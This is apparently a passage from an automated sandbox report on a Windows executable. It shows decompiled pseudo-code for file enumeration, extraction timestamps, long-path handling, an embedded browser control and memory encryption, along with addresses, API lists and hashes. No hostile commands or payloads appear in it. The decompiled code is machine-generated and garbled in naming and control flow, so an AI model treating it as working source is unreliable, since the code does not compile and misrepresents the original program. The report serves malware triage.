																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00855070(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00859E86);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0084E243(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E00857AC6(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E0085DDD0( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0085A248( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E00857F42();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00857E21();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x00859ea3
0x00859ea6
0x00859eac
0x00859ec4
0x00859ec7
0x00859ecb
0x00859ecd
0x00859ecf
0x00859ed1
0x00859ed4
0x00859ed7
0x00859eda
0x00859edc
0x00859f34
0x00859f34
0x00859f3a
0x00859f3c
0x00859f47
0x00859f4b
0x00859f4d
0x00859f50
0x00859f54
0x00859f54
0x00859f56
0x00859f58
0x00859f5a
0x00859f5c
0x00859f5c
0x00859f5e
0x00859f61
0x00859f64
0x00859f64
0x00859f66
0x00859f67
0x00859f67
0x00859f72
0x00859f74
0x00859f77
0x00859f78
0x00859f7b
0x00859f7b
0x00859f7f
0x00859f82
0x00859f85
0x00859f85
0x00859f93
0x00859f95
0x00859f98
0x00859f9a
0x00859fa4
0x00859fa7
0x00859faa
0x00859fac
0x00859faf
0x00859fb1
0x0085a001
0x0085a004
0x0085a004
0x0085a006
0x00000000
0x00859fb3
0x00859fb5
0x00859fb5
0x00859fb7
0x00859fba
0x00859fba
0x00859fbf
0x00859fc2
0x00859fc2
0x00859fc4
0x00859fc5
0x00859fc5
0x00859fc9
0x00859fcc
0x00859fcc
0x00859fcf
0x00859fd2
0x00859fdf
0x00859fe4
0x00859fe7
0x00859fe9
0x0085a023
0x0085a024
0x0085a025
0x0085a026
0x0085a027
0x0085a028
0x0085a02d
0x0085a031
0x0085a033
0x0085a034
0x0085a037
0x0085a037
0x0085a03a
0x0085a03a
0x0085a03c
0x0085a03d
0x0085a03d
0x0085a046
0x0085a047
0x0085a04a
0x0085a04d
0x0085a050
0x0085a052
0x0085a059
0x0085a05b
0x0085a05e
0x0085a068
0x0085a06b
0x0085a06c
0x0085a06e
0x0085a082
0x0085a082
0x0085a085
0x0085a08f
0x0085a094
0x0085a097
0x0085a099
0x00000000
0x0085a09b
0x0085a09f
0x0085a0a8
0x0085a0ae
0x00000000
0x0085a0b1
0x0085a070
0x0085a070
0x0085a076
0x0085a07b
0x0085a07e
0x0085a080
0x0085a0b7
0x0085a0b9
0x0085a0ba
0x0085a0bb
0x0085a0bc
0x0085a0bd
0x0085a0be
0x0085a0c3
0x0085a0c6
0x0085a0c7
0x0085a0c9
0x0085a0cf
0x0085a0d6
0x0085a0d9
0x0085a0dc
0x0085a0dd
0x0085a0e0
0x0085a0e1
0x0085a0e4
0x0085a0e5
0x0085a106
0x0085a106
0x0085a108
0x00000000
0x00000000
0x0085a0ed
0x0085a0ef
0x0085a0f1
0x0085a0f3
0x0085a0f5
0x0085a0f7
0x0085a0f9
0x0085a104
0x00000000
0x0085a104
0x0085a0f9
0x0085a0f5
0x00000000
0x0085a0f1
0x0085a10a
0x0085a10c
0x0085a10f
0x0085a128
0x0085a128
0x0085a12a
0x0085a12d
0x0085a13d
0x0085a13f
0x0085a13f
0x0085a12f
0x0085a12f
0x0085a132
0x00000000
0x0085a134
0x0085a134
0x0085a137
0x00000000
0x0085a139
0x0085a139
0x0085a139
0x0085a137
0x0085a132
0x0085a14d
0x0085a151
0x0085a15f
0x0085a164
0x0085a179
0x0085a17b
0x0085a181
0x0085a184
0x0085a1b6
0x0085a1b6
0x0085a1bb
0x0085a1c1
0x0085a1c1
0x0085a1c8
0x0085a1e2
0x0085a1e2
0x0085a1e3
0x0085a1e9
0x0085a1ef
0x0085a1f0
0x0085a1f1
0x0085a1f6
0x0085a1f9
0x0085a1fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0085a1ca
0x0085a1ca
0x0085a1d0
0x0085a1d2
0x00000000
0x0085a1d4
0x0085a1d4
0x0085a1d7
0x00000000
0x0085a1d9
0x0085a1d9
0x0085a1e0
0x00000000
0x00000000
0x00000000
0x00000000
0x0085a1e0
0x0085a1d7
0x0085a1d2
0x00000000
0x0085a1fd
0x0085a205
0x0085a20b
0x0085a20d
0x0085a20d
0x0085a215
0x0085a21a
0x0085a222
0x0085a225
0x0085a227
0x0085a23b
0x0085a240
0x0085a186
0x0085a186
0x0085a187
0x0085a188
0x0085a189
0x0085a18a
0x0085a192
0x0085a192
0x0085a192
0x0085a194
0x0085a197
0x0085a19a
0x0085a19a
0x0085a111
0x0085a114
0x0085a116
0x00000000
0x0085a118
0x0085a118
0x0085a11b
0x0085a11c
0x0085a11d
0x0085a11e
0x0085a123
0x0085a116
0x0085a1a2
0x0085a1a7
0x0085a1b2
0x00000000
0x00000000
0x00000000
0x0085a080
0x0085a054
0x0085a056
0x0085a0b2
0x0085a0b6
0x0085a0b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00859feb
0x00859fee
0x00859ff1
0x00859ff4
0x00859ff7
0x00859ffa
0x00859ffd
0x00859ffd
0x00000000
0x00859fba
0x00859f9c
0x00859f9c
0x0085a008
0x0085a00a
0x00000000
0x0085a00f
0x00859ede
0x00859ede
0x00859ee1
0x00859eea
0x00859eed
0x00859ef4
0x00859ef6
0x00859f0f
0x00859f10
0x00859f11
0x00859f13
0x00859f18
0x00859ef8
0x00859ef8
0x00859efb
0x00859efc
0x00859efe
0x00859f00
0x00859f02
0x00859f07
0x00859f07
0x00859f1b
0x00859f1d
0x00859f1f
0x00000000
0x00000000
0x00859f25
0x00859f28
0x00859f2a
0x00859f2c
0x00000000
0x00859f2e
0x00859f2e
0x00859f31
0x00000000
0x00859f31
0x00000000
0x00859f2c
0x0085a010
0x0085a013
0x0085a018
0x00000000
0x0085a01b
0x00859eae
0x00859eae
0x00859eb5
0x00859eb6
0x00859eb8
0x00859ebd
0x0085a01c
0x0085a020
0x0085a020
0x00000000

APIs

_free.LIBCMT ref: 0085A00A

Part of subcall function 00857E31: IsProcessorFeaturePresent.KERNEL32(00000017,00857E20,0000002C,0086AA30,0085AFC3,00000000,00000000,008585F4,?,?,00857E2D,00000000,00000000,00000000,00000000,00000000), ref: 00857E33
Part of subcall function 00857E31: GetCurrentProcess.KERNEL32(C0000417,0086AA30,0000002C,00857B5E,00000016,008585F4), ref: 00857E55
Part of subcall function 00857E31: TerminateProcess.KERNEL32(00000000), ref: 00857E5C

Strings

., xrefs: 0085A1C1
*?, xrefs: 00859EE1

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 508a7545cd9675eca434abbd3fe5994820486329c798d74d3b033fce6636bdc7
Instruction ID: e8449b65cb5a0f406abee0c13a76fe50b233d9d48437e1b58843cfe8d504e78d
Opcode Fuzzy Hash: 508a7545cd9675eca434abbd3fe5994820486329c798d74d3b033fce6636bdc7
Instruction Fuzzy Hash: 50519E75E0020AEFDF14DFA8C881AADBBB5FF48315F248169EC54E7341EA359E098B51

Uniqueness

Uniqueness Score: -1.00%

Function 00837663, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00837663(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E0084D8C4(E0086131C, __ecx);
				E0084D9C0();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E0083FAE7(_t108 - 0x1010, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00837866(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E0083FABF(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
							E00836FEC(_t108 - 0x307c);
							_push(0);
							_t54 = E0083A255(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
							_t85 =  *(_t108 - 0x2074);
							 *((char*)(_t108 + 0x13)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E0083A1D3(_t106, _t85 & 0xfffffffe);
							}
							E008394D4(_t108 - 0x2034);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00839C8A(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2034);
								_push(0);
								_t68 = E00833AAF(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E00839572(_t108 - 0x2034);
								}
							}
							E008394D4(_t108 - 0x50a0);
							__eflags =  *((char*)(_t108 + 0x13));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 + 0x13)) != 0) {
								_t62 = E0083980C(_t108 - 0x50a0, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
								}
							}
							E0083A1D3(_t106,  *(_t108 - 0x2074));
							E00839506(_t108 - 0x50a0);
							_t90 = _t108 - 0x2034;
						} else {
							E008394D4(_t108 - 0x60c4);
							_push(1);
							_push(_t108 - 0x60c4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00833AAF(_t81, _t99);
							_t90 = _t108 - 0x60c4;
						}
						_t61 = E00839506(_t90);
					} else {
						E00831F29(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E00836F18(0x8700e0, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E0083FAE7(_t108 - 0x1010, 0x862490, 0x802);
					E0083FABF(_t112, _t108 - 0x1010, _t106, 0x802);
					goto L4;
				}
			}

0x00837663
0x00837668
0x00837672
0x00837679
0x00837682
0x008376b1
0x008376b1
0x008376bf
0x008376c4
0x008376c4
0x008376d4
0x008376d9
0x008376e1
0x00837700
0x00837704
0x00837741
0x0083774c
0x00837759
0x0083775c
0x00837761
0x00837767
0x0083776a
0x0083776d
0x0083776f
0x00837774
0x00837774
0x0083777f
0x0083778c
0x0083779a
0x0083779f
0x008377a1
0x008377a3
0x008377ac
0x008377ad
0x008377ae
0x008377b3
0x008377b5
0x008377bd
0x008377bd
0x008377b5
0x008377c8
0x008377cd
0x008377d1
0x008377d5
0x008377e0
0x008377e5
0x008377e7
0x00837804
0x00837804
0x008377e7
0x00837811
0x0083781c
0x00837821
0x00837706
0x0083770c
0x00837711
0x0083771b
0x0083771c
0x0083771f
0x00837722
0x00837727
0x00837727
0x00837827
0x008376e3
0x008376ea
0x008376f6
0x008376f6
0x00837832
0x0083783c
0x0083783c
0x00837684
0x00837688
0x00000000
0x0083768a
0x0083768a
0x0083769c
0x008376aa
0x00000000
0x008376aa

APIs

__EH_prolog.LIBCMT ref: 00837668
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00837804

Part of subcall function 0083A1D3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A009,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A1E7
Part of subcall function 0083A1D3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A009,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A218

Strings

:, xrefs: 008376D9

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: a0a63e7d6fe7d0470297f80b431f96e2621cf504add82e6ec098422f2e14673a
Instruction ID: 3252ee16d05227a0eedae38861725bde85b2d6e7e842f504d20aaa3988cbbe34
Opcode Fuzzy Hash: a0a63e7d6fe7d0470297f80b431f96e2621cf504add82e6ec098422f2e14673a
Instruction Fuzzy Hash: 7E417F71805118AADB24EB58CC55EEE777CFF85300F0040E5B646E2182DB749F88CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0083B3C9, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0083B3C9(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E0084D9C0();
				_t71 = _a4;
				if( *_t71 != 0) {
					E0083B563(_t71);
					_t66 = E00852B93(_t71);
					_t30 = E0083B58F(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E0083B66A( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E0083AF49(__eflags,  &_v4100, 0x800);
							_t39 = E00852B93( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E0083FAE7(_a8, L"\\\\?\\", _t69);
							E0083FABF(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E0083B66A(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E0083FABF(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E0083FAE7(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E0083FABF(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E0083B563(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E0083FAE7(_a8, L"\\\\?\\", _t73);
						E0083FABF(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E0083FAE7(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}

0x0083b3d1
0x0083b3d7
0x0083b3de
0x0083b3ea
0x0083b3f7
0x0083b3f9
0x0083b3fe
0x0083b400
0x0083b486
0x0083b48c
0x0083b48e
0x0083b54d
0x0083b54d
0x0083b54d
0x0083b54f
0x00000000
0x0083b550
0x0083b494
0x0083b496
0x00000000
0x00000000
0x0083b4a5
0x0083b4a7
0x0083b4ec
0x0083b4f8
0x0083b502
0x0083b506
0x0083b508
0x00000000
0x00000000
0x0083b513
0x0083b523
0x0083b528
0x0083b52c
0x0083b538
0x0083b53a
0x0083b53c
0x0083b53c
0x0083b53c
0x0083b53a
0x0083b53f
0x0083b53f
0x0083b540
0x0083b540
0x0083b541
0x0083b541
0x0083b544
0x0083b549
0x00000000
0x0083b549
0x0083b4a9
0x0083b4ac
0x0083b4af
0x0083b4b1
0x00000000
0x00000000
0x0083b4c0
0x0083b4c7
0x0083b4d9
0x00000000
0x0083b4d9
0x0083b403
0x0083b408
0x0083b40a
0x0083b432
0x0083b433
0x0083b436
0x00000000
0x00000000
0x0083b43c
0x0083b43f
0x0083b442
0x00000000
0x00000000
0x0083b448
0x0083b44b
0x0083b44e
0x0083b450
0x00000000
0x00000000
0x0083b45f
0x0083b46d
0x0083b472
0x0083b473
0x00000000
0x0083b473
0x0083b40c
0x0083b40f
0x0083b412
0x00000000
0x00000000
0x0083b423
0x0083b428
0x00000000
0x0083b3e0
0x0083b3e0
0x0083b551
0x0083b555
0x0083b555

Strings

\\?\, xrefs: 0083B41B, 0083B457, 0083B4B8, 0083B50B
UNC, xrefs: 0083B465

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 873d0e1e2c519b9dd7648b02a60321b3729f2ae2c4b451562a9e64c097a6a56b
Instruction ID: 2f5254512beecc4203f81bdf092bf90da5a75b34e8ee07dd3a0d7d6b5f18f0df
Opcode Fuzzy Hash: 873d0e1e2c519b9dd7648b02a60321b3729f2ae2c4b451562a9e64c097a6a56b
Instruction Fuzzy Hash: 4641C5B1500259B6CF21AF64DC42EEE7769FF81360F144066FA58E3141E774DE90CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 00848A72, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00848A72(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				char _t19;
				intOrPtr* _t23;
				signed int _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t43;
				intOrPtr _t44;
				signed int* _t48;

				_t44 = _a4;
				_t43 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t44;
				_t18 = E0084D880(__edx, _t44, __eflags, 0x30);
				_a4 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E00848428(_t18);
				}
				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
				if(_t19 == 0) {
					return _t19;
				} else {
					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
					E008491F7( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
					E00849390( *((intOrPtr*)(_t43 + 0xc)), 1);
					E00849346( *((intOrPtr*)(_t43 + 0xc)), 1);
					_t23 = E008492AB( *((intOrPtr*)(_t43 + 0xc)));
					_t28 = _t23;
					if(_t28 == 0) {
						L7:
						__eflags =  *(_t43 + 0x10);
						if( *(_t43 + 0x10) != 0) {
							E008485F4(_t43);
							_t25 =  *(_t43 + 0x10);
							_push(0);
							_push(0);
							_push(0);
							 *((char*)(_t43 + 0x25)) = 0;
							_t38 =  *_t25;
							_push(0);
							__eflags =  *(_t43 + 0x20);
							if( *(_t43 + 0x20) == 0) {
								_push(L"about:blank");
							} else {
								_push( *(_t43 + 0x20));
							}
							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
						}
						L12:
						return _t23;
					}
					_t10 = _t43 + 0x10; // 0x10
					_t48 = _t10;
					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0x86412c, _t48);
					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
					if(_t26 >= 0) {
						goto L7;
					}
					 *_t48 =  *_t48 & 0x00000000;
					goto L12;
				}
			}

0x00848a73
0x00848a78
0x00848a7c
0x00848a7f
0x00848a84
0x00848a8b
0x00848a96
0x00848a96
0x00848a8d
0x00848a8f
0x00848a8f
0x00848a98
0x00848a9d
0x00848b28
0x00848aa3
0x00848aa5
0x00848ab0
0x00848aba
0x00848ac4
0x00848acc
0x00848ad1
0x00848ad5
0x00848af7
0x00848af9
0x00848afc
0x00848b00
0x00848b05
0x00848b08
0x00848b09
0x00848b0a
0x00848b0b
0x00848b0e
0x00848b10
0x00848b11
0x00848b14
0x00848b1b
0x00848b16
0x00848b16
0x00848b16
0x00848b21
0x00848b21
0x00848b24
0x00000000
0x00848b25
0x00848ad9
0x00848ad9
0x00848ae3
0x00848aea
0x00848aef
0x00000000
0x00000000
0x00848af1
0x00000000
0x00848af1

APIs

new.LIBCMT ref: 00848A7F

Strings

Shell.Explorer, xrefs: 00848AAB
about:blank, xrefs: 00848B1B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 6d01630c75c859344a8540ba6fdf2aa08eb3208ae71fb649876f64aaff4d4d9d
Instruction ID: 46824d92d758f301eb73ce446221756000c7a1cc89b13f3f25c0d29aa985e253
Opcode Fuzzy Hash: 6d01630c75c859344a8540ba6fdf2aa08eb3208ae71fb649876f64aaff4d4d9d
Instruction Fuzzy Hash: 76214D7170065EEFD714DF68C895E2AB7A8FF45324B04462AF215CB681DFB4E850CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0083E898, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E0083E898(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed char _t13;
				void* _t17;
				signed char _t18;
				void* _t20;
				signed int _t22;
				signed int _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t32 = __edi;
				_t17 = __ebx;
				_t11 =  *0x877358; // 0x0
				if(_t11 == 0) {
					E0083E819(0x877350);
					_t11 =  *0x877358; // 0x0
				}
				_t36 = _a8;
				_t22 = _t36 & 0xfffffff0;
				_t30 = 0 | _a16 != 0x00000000;
				if(_a12 == 0) {
					_t12 =  *0x87735c; // 0x0
					if(_t12 == 0) {
						goto L10;
					} else {
						_t13 =  *_t12(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					if(_t11 == 0) {
						L10:
						_push(_t17);
						_t13 = GetCurrentProcessId();
						_t31 = 0;
						_t18 = _t13;
						if(_t36 != 0) {
							_push(_t32);
							_t33 = _a4;
							_t20 = _t18 + 0x4b;
							do {
								_t13 = _t31 + _t20;
								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
								_t31 = _t31 + 1;
							} while (_t31 < _t36);
						}
					} else {
						_t13 =  *_t11(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0x8700e0);
							_t13 = E00836DE3(E0084E76A(E00836DE8(_t22)), 0x8700e0, 0x8700e0, 2);
						}
					}
				}
				return _t13;
			}

0x0083e898
0x0083e898
0x0083e89b
0x0083e8a2
0x0083e8a9
0x0083e8ae
0x0083e8ae
0x0083e8b4
0x0083e8bb
0x0083e8c1
0x0083e8c8
0x0083e8fd
0x0083e904
0x00000000
0x0083e906
0x0083e90b
0x0083e90f
0x0083e911
0x00000000
0x0083e911
0x0083e90f
0x0083e8ca
0x0083e8cc
0x0083e918
0x0083e918
0x0083e919
0x0083e91f
0x0083e921
0x0083e925
0x0083e927
0x0083e928
0x0083e92b
0x0083e92e
0x0083e931
0x0083e934
0x0083e936
0x0083e937
0x0083e93b
0x0083e8ce
0x0083e8d3
0x0083e8d7
0x0083e8d9
0x0083e8de
0x0083e8e3
0x0083e8f6
0x0083e8f6
0x0083e8d7
0x0083e8cc
0x0083e93f

APIs

Part of subcall function 0083E819: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083E838
Part of subcall function 0083E819: GetProcAddress.KERNEL32(00877350,CryptUnprotectMemory), ref: 0083E848

GetCurrentProcessId.KERNEL32(?,?,?,0083E892), ref: 0083E919

Strings

CryptUnprotectMemory failed, xrefs: 0083E911
CryptProtectMemory failed, xrefs: 0083E8D9

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
